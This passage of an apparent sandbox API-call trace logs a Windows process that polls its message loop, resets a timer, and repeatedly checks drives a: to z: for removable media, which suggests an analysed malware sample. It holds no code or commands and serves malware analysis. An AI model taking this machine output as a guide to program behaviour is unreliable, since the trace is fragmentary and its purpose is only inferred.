(lpMsg=0x7dfb8c) returned 0 [0215.560] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.560] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.561] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.561] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.562] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.562] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.562] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.562] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.562] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.562] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.563] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.563] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.563] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.563] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.564] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.564] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.564] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.564] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.564] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.565] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.565] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.565] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.565] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.565] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.566] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.566] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.567] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.567] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.567] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.567] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.568] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.569] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0215.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0215.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0215.569] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0215.570] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.570] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.571] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.571] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.571] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.572] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.572] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.572] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.572] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.572] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.572] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.573] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.573] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.573] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.573] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.573] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.574] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.574] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.574] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.574] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.575] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.575] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.575] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.575] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.575] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.575] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.576] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.576] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.576] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.577] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0215.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0215.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0215.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.579] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.579] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.579] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.579] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.580] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.580] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.580] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.580] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.580] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.580] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.580] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.581] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.581] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.581] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.581] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.581] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.583] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.583] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.583] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.583] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.583] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.584] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.584] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.584] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.584] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.584] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.584] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.584] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.585] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.585] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.585] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.585] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.585] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.586] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0215.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0215.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.587] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.587] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.587] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 